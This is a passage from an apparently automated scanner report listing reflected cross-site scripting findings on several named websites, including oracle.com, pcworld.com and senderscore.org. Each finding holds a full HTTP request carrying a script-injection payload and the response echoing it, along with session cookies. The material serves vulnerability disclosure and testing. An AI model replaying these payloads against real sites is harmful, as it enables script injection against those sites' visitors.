<a href='/pmide22eb'><img src=a onerror=alert(1)>65ff3245d2/index.php' class='nav_select'>
...[SNIP]...

6.377. http://www.nextadvisor.com/pmid/style.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nextadvisor.com
Path:   /pmid/style.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 99035"><script>alert(1)</script>aad44ddd58a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pmid/style.css99035"><script>alert(1)</script>aad44ddd58a HTTP/1.1
Host: www.nextadvisor.com
Proxy-Connection: keep-alive
Referer: http://www.nextadvisor.com/pmid/?kw=id%2520gid9a%2520identity%2520theft%2520resource_ordering34--2011-04-23--20-10-01CD1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=ca43057bfb377bbe8c129dafe1c6ec28; __utmz=252293142.1303613812.1.1.utmgclid=CJa0kuyTtKgCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303613812.1303613812.1; __utmc=252293142; __utmb=252293142.1.10.1303613812

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 03:30:47 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 11911


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<meta http-equiv="Conten
...[SNIP]...
<link rel="canonical" href="http://www.nextadvisor.com/pmid/style.css99035"><script>alert(1)</script>aad44ddd58a" />
...[SNIP]...

6.378. http://www.oracle.com/dm/design/events/images/spacer.gif [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.oracle.com
Path:   /dm/design/events/images/spacer.gif

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a7a3a"%3b24fe14e0221 was submitted in the REST URL parameter 2. This input was echoed as a7a3a";24fe14e0221 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /dm/designa7a3a"%3b24fe14e0221/events/images/spacer.gif HTTP/1.1
Host: www.oracle.com
Proxy-Connection: keep-alive
Referer: http://www.oracle.com/webapps/dialogue/ns/dlgwelcome.jsp?p_ext=Y&p_dlg_id=8834744&src=7054579&Act=9&sckw=WWMK10058753MPP001.GCM.8100.110
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServermktap-dialogue_http_pool=252547725.57095.0000

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.2.0 (M;max-age=60+0;age=0;ecid=221083496623897486,0)
Vary: Accept-Encoding
Date: Sun, 24 Apr 2011 19:46:07 GMT
Connection: close
Content-Length: 77561

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN">
<html lang="en" dir="ltr">
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
   <meta name="GENERATOR" content="Idc Content 10gR
...[SNIP]...
<script language="JavaScript">window.location.href = "/ocom/idcplg?IdcService=GET_DOC_PAGE&Action=GetTemplatePage&Page=CoS_REDIRECT_PAGE&StatusMessage=Failed to locate relative path 'designa7a3a";24fe14e0221/events/images' in hierarchy of site 'ocom_DM'.";</script>
...[SNIP]...

6.379. http://www.oracle.com/dm/design/events/images/spacer.gif [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.oracle.com
Path:   /dm/design/events/images/spacer.gif

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 72ffd"%3b21000fd4e01 was submitted in the REST URL parameter 3. This input was echoed as 72ffd";21000fd4e01 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /dm/design/events72ffd"%3b21000fd4e01/images/spacer.gif HTTP/1.1
Host: www.oracle.com
Proxy-Connection: keep-alive
Referer: http://www.oracle.com/webapps/dialogue/ns/dlgwelcome.jsp?p_ext=Y&p_dlg_id=8834744&src=7054579&Act=9&sckw=WWMK10058753MPP001.GCM.8100.110
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServermktap-dialogue_http_pool=252547725.57095.0000

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.2.0 (M;max-age=60+0;age=0;ecid=221083986250181480,0)
Vary: Accept-Encoding
Date: Sun, 24 Apr 2011 19:46:18 GMT
Connection: close
Content-Length: 77561

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN">
<html lang="en" dir="ltr">
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
   <meta name="GENERATOR" content="Idc Content 10gR
...[SNIP]...
<script language="JavaScript">window.location.href = "/ocom/idcplg?IdcService=GET_DOC_PAGE&Action=GetTemplatePage&Page=CoS_REDIRECT_PAGE&StatusMessage=Failed to locate relative path 'design/events72ffd";21000fd4e01/images' in hierarchy of site 'ocom_DM'.";</script>
...[SNIP]...

6.380. http://www.oracle.com/dm/design/events/images/spacer.gif [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.oracle.com
Path:   /dm/design/events/images/spacer.gif

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6cea1"%3bc2af04b1d99 was submitted in the REST URL parameter 4. This input was echoed as 6cea1";c2af04b1d99 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /dm/design/events/images6cea1"%3bc2af04b1d99/spacer.gif HTTP/1.1
Host: www.oracle.com
Proxy-Connection: keep-alive
Referer: http://www.oracle.com/webapps/dialogue/ns/dlgwelcome.jsp?p_ext=Y&p_dlg_id=8834744&src=7054579&Act=9&sckw=WWMK10058753MPP001.GCM.8100.110
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServermktap-dialogue_http_pool=252547725.57095.0000

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.2.0 (M;max-age=60+0;age=0;ecid=130954716018922649,0)
Vary: Accept-Encoding
Date: Sun, 24 Apr 2011 19:46:29 GMT
Connection: close
Content-Length: 77561

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN">
<html lang="en" dir="ltr">
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
   <meta name="GENERATOR" content="Idc Content 10gR
...[SNIP]...
cript language="JavaScript">window.location.href = "/ocom/idcplg?IdcService=GET_DOC_PAGE&Action=GetTemplatePage&Page=CoS_REDIRECT_PAGE&StatusMessage=Failed to locate relative path 'design/events/images6cea1";c2af04b1d99' in hierarchy of site 'ocom_DM'.";</script>
...[SNIP]...

6.381. http://www.pcworld.com/pcworldconnect/comment_registration [callingurl parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /pcworldconnect/comment_registration

Issue detail

The value of the callingurl request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 23c8c"><script>alert(1)</script>63c1ec7c89b was submitted in the callingurl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /pcworldconnect/comment_registration?callingurl=http://www.pcworld.com/article/149142/identity_theft_monitoring_services_called_waste.html23c8c"><script>alert(1)</script>63c1ec7c89b HTTP/1.1
Host: www.pcworld.com
Proxy-Connection: keep-alive
Referer: http://www.pcworld.com/article/149142/identity_theft_monitoring_services_called_waste.html
Origin: http://www.pcworld.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/xml
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=205278865.1910705707.1303674274.1303674274.1303674274.1; __utmb=205278865; __utmc=205278865; __utmz=205278865.1303674274.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); pcw.last_uri=/article/149142/identity_theft_monitoring_services_called_waste.html; fsr.a=1303674281645; JSESSIONID=00497792CB5578F6F5DDC4DEE6210001; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B
Content-Length: 0

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 19:52:06 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Set-Cookie: JSESSIONID=33B0354189D45335727C6C6C460F1986; Path=/
Vary: Accept-Encoding
Content-Length: 6268


<div class="userAction radius_5" style="display:none;" id="regCommentFormContainer">
<span class="tail"></span>
<img class="png astrisk" src="http://images.pcworld.com/images/shar
...[SNIP]...
<input type="hidden" id="callingurl" name="callingurl" value="http://www.pcworld.com/article/149142/identity_theft_monitoring_services_called_waste.html23c8c"><script>alert(1)</script>63c1ec7c89b" />
...[SNIP]...

6.382. http://www.positivesearchresults.com/templates/gk_corporate/lib/scripts/menu.php [speed parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.positivesearchresults.com
Path:   /templates/gk_corporate/lib/scripts/menu.php

Issue detail

The value of the speed request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 8abc1%3balert(1)//8de1c9d96aa was submitted in the speed parameter. This input was echoed as 8abc1;alert(1)//8de1c9d96aa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /templates/gk_corporate/lib/scripts/menu.php?width=1&height=1&opacity=1&animation=1&speed=1808abc1%3balert(1)//8de1c9d96aa HTTP/1.1
Host: www.positivesearchresults.com
Proxy-Connection: keep-alive
Referer: http://www.positivesearchresults.com/?gclid=CM3Ir8m1tqgCFcPd4AodKWFhDw
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bbd55d5d7e98372b0a401649530373ff=5e1d086ddffa92bea8c641966a14494e; __utmx=35867937.; __utmxx=35867937.; __utmx_k_76107852=1

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 00:32:54 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 DAV/2 mod_mono/2.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.13
Content-Type: text/javascript
Content-Length: 3499

// GK MooMenu v.2.0 Copyright by GavickPro
window.addEvent("domready", function(){
   // necessary classes
       Fx.Height = Fx.Style.extend({initialize: function(el, options){$(el).setStyle('overflow', 'hi
...[SNIP]...
ghtFX.push(new Array());        widthFX.push(new Array());        
       el.getElementsBySelector("ul").each(function(elm,j){
           levels[i].push(elm.getParent());
           opacityFX[i].push(new Fx.Opacity(elm, {duration: 1808abc1;alert(1)//8de1c9d96aa, transition: Fx.Transitions.linear,wait:true}).set(0));            heightFX[i].push(new Fx.Height(elm, {duration: 1808abc1;alert(1)//8de1c9d96aa, transition: Fx.Transitions.linear,wait:true}).set(0));            widthF
...[SNIP]...

6.383. http://www.reputationengineer.com/wp-content/plugins/cforms/lib_ajax.php [rs parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.reputationengineer.com
Path:   /wp-content/plugins/cforms/lib_ajax.php

Issue detail

The value of the rs request parameter is copied into the HTML document as plain text between tags. The payload 68a54<script>alert(1)</script>220683bccf9cf2de7 was submitted in the rs parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /wp-content/plugins/cforms/lib_ajax.php?rs=reset_captcha68a54<script>alert(1)</script>220683bccf9cf2de7&rst=&rsrnd=1303692470955&rsargs[]= HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Method: POST http://www.reputationengineer.com/wp-content/plugins/cforms/lib_ajax.php HTTP/1.1
Cache-Control: no-cache
Host: www.reputationengineer.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 01:32:07 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.15
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Last-Modified: Mon, 25 Apr 2011 01:32:08 GMT
Content-Type: text/html
Content-Length: 75

-:reset_captcha68a54<script>alert(1)</script>220683bccf9cf2de7 not callable

6.384. http://www.reputationmanagementconsultants.com/ [gclid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.reputationmanagementconsultants.com
Path:   /

Issue detail

The value of the gclid request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload e1878><script>alert(1)</script>fc65128e9f6 was submitted in the gclid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?utm_source=google&utm_medium=cpc&utm_term=keyword&utm_content=search&utm_campaign=RM&gclid=COXtr8e1tqgCFYLc4Aod_H_yBQe1878><script>alert(1)</script>fc65128e9f6 HTTP/1.1
Host: www.reputationmanagementconsultants.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 00:33:35 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html
Content-Length: 17985

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Reputation Managemen
...[SNIP]...
<input name="gclid" type="hidden" value=COXtr8e1tqgCFYLc4Aod_H_yBQe1878><script>alert(1)</script>fc65128e9f6 />
...[SNIP]...

6.385. http://www.reputationmanagementconsultants.com/ [utm_campaign parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.reputationmanagementconsultants.com
Path:   /

Issue detail

The value of the utm_campaign request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 508bb><script>alert(1)</script>883f8fb7c05 was submitted in the utm_campaign parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?utm_source=google&utm_medium=cpc&utm_term=keyword&utm_content=search&utm_campaign=RM508bb><script>alert(1)</script>883f8fb7c05&gclid=COXtr8e1tqgCFYLc4Aod_H_yBQ HTTP/1.1
Host: www.reputationmanagementconsultants.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 00:33:27 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html
Content-Length: 17985

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Reputation Managemen
...[SNIP]...
<input name="campaign" type="hidden" value=RM508bb><script>alert(1)</script>883f8fb7c05 />
...[SNIP]...

6.386. http://www.reputationmanagementconsultants.com/ [utm_content parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.reputationmanagementconsultants.com
Path:   /

Issue detail

The value of the utm_content request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 8a666><script>alert(1)</script>b18430cffbe was submitted in the utm_content parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?utm_source=google&utm_medium=cpc&utm_term=keyword&utm_content=search8a666><script>alert(1)</script>b18430cffbe&utm_campaign=RM&gclid=COXtr8e1tqgCFYLc4Aod_H_yBQ HTTP/1.1
Host: www.reputationmanagementconsultants.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 00:33:20 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html
Content-Length: 17985

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Reputation Managemen
...[SNIP]...
<input name="content" type="hidden" value=search8a666><script>alert(1)</script>b18430cffbe />
...[SNIP]...

6.387. http://www.reputationmanagementconsultants.com/ [utm_medium parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.reputationmanagementconsultants.com
Path:   /

Issue detail

The value of the utm_medium request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 19df0><script>alert(1)</script>77ee91043e3 was submitted in the utm_medium parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?utm_source=google&utm_medium=cpc19df0><script>alert(1)</script>77ee91043e3&utm_term=keyword&utm_content=search&utm_campaign=RM&gclid=COXtr8e1tqgCFYLc4Aod_H_yBQ HTTP/1.1
Host: www.reputationmanagementconsultants.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 00:33:06 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html
Content-Length: 17985

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Reputation Managemen
...[SNIP]...
<input name="medium" type="hidden" value=cpc19df0><script>alert(1)</script>77ee91043e3 />
...[SNIP]...

6.388. http://www.reputationmanagementconsultants.com/ [utm_source parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.reputationmanagementconsultants.com
Path:   /

Issue detail

The value of the utm_source request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 3e89c><script>alert(1)</script>fa621272d95 was submitted in the utm_source parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?utm_source=google3e89c><script>alert(1)</script>fa621272d95&utm_medium=cpc&utm_term=keyword&utm_content=search&utm_campaign=RM&gclid=COXtr8e1tqgCFYLc4Aod_H_yBQ HTTP/1.1
Host: www.reputationmanagementconsultants.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 00:32:59 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html
Content-Length: 17985

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Reputation Managemen
...[SNIP]...
<input name="source" type="hidden" value=google3e89c><script>alert(1)</script>fa621272d95 />
...[SNIP]...

6.389. http://www.reputationmanagementconsultants.com/ [utm_term parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.reputationmanagementconsultants.com
Path:   /

Issue detail

The value of the utm_term request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload fcf4c><script>alert(1)</script>3d8088ca4ac was submitted in the utm_term parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?utm_source=google&utm_medium=cpc&utm_term=keywordfcf4c><script>alert(1)</script>3d8088ca4ac&utm_content=search&utm_campaign=RM&gclid=COXtr8e1tqgCFYLc4Aod_H_yBQ HTTP/1.1
Host: www.reputationmanagementconsultants.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 00:33:13 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html
Content-Length: 17985

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Reputation Managemen
...[SNIP]...
<input name="term" type="hidden" value=keywordfcf4c><script>alert(1)</script>3d8088ca4ac />
...[SNIP]...

6.390. https://www.senderscore.org/landing/ppcregistration/index.php [campid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.senderscore.org
Path:   /landing/ppcregistration/index.php

Issue detail

The value of the campid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 604c8"><script>alert(1)</script>afbaec2bc46 was submitted in the campid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /landing/ppcregistration/index.php?campid=701000000005Ucl604c8"><script>alert(1)</script>afbaec2bc46&s_kwcid=TC|13707|reputation%20monitoring||S|b|6248101451&gclid=CMrtpuG1tqgCFQVN4AodmBn1DQ HTTP/1.1
Host: www.senderscore.org
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 01:31:06 GMT
Server: Apache/2.2.9 (Unix) DAV/2 PHP/5.2.6
X-Powered-By: PHP/5.2.6
Set-Cookie: campid=701000000005Ucl604c8%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Eafbaec2bc46; expires=Wed, 25-May-2011 01:31:06 GMT; path=/; domain=www.senderscore.org; httponly
Set-Cookie: ss_lookup=egunknjgat5ju6cgfv9n36k460; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Set-Cookie: BIGipServerw3pub=3372373002.20480.0000; path=/
Content-Length: 33370


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link href="style.css" re
...[SNIP]...
<form action="/landing/ppcregistration/index.php?campid=701000000005Ucl604c8"><script>alert(1)</script>afbaec2bc46&s_kwcid=TC|13707|reputation%20monitoring||S|b|6248101451&gclid=CMrtpuG1tqgCFQVN4AodmBn1DQ" method="post" name="form1" id="form1" onsubmit="this.submit.disabled=true;">
...[SNIP]...

6.391. https://www.senderscore.org/landing/ppcregistration/index.php [gclid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.senderscore.org
Path:   /landing/ppcregistration/index.php

Issue detail

The value of the gclid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b19e2"><script>alert(1)</script>321176dfabb was submitted in the gclid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /landing/ppcregistration/index.php?campid=701000000005Ucl&s_kwcid=TC|13707|reputation%20monitoring||S|b|6248101451&gclid=CMrtpuG1tqgCFQVN4AodmBn1DQb19e2"><script>alert(1)</script>321176dfabb HTTP/1.1
Host: www.senderscore.org
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
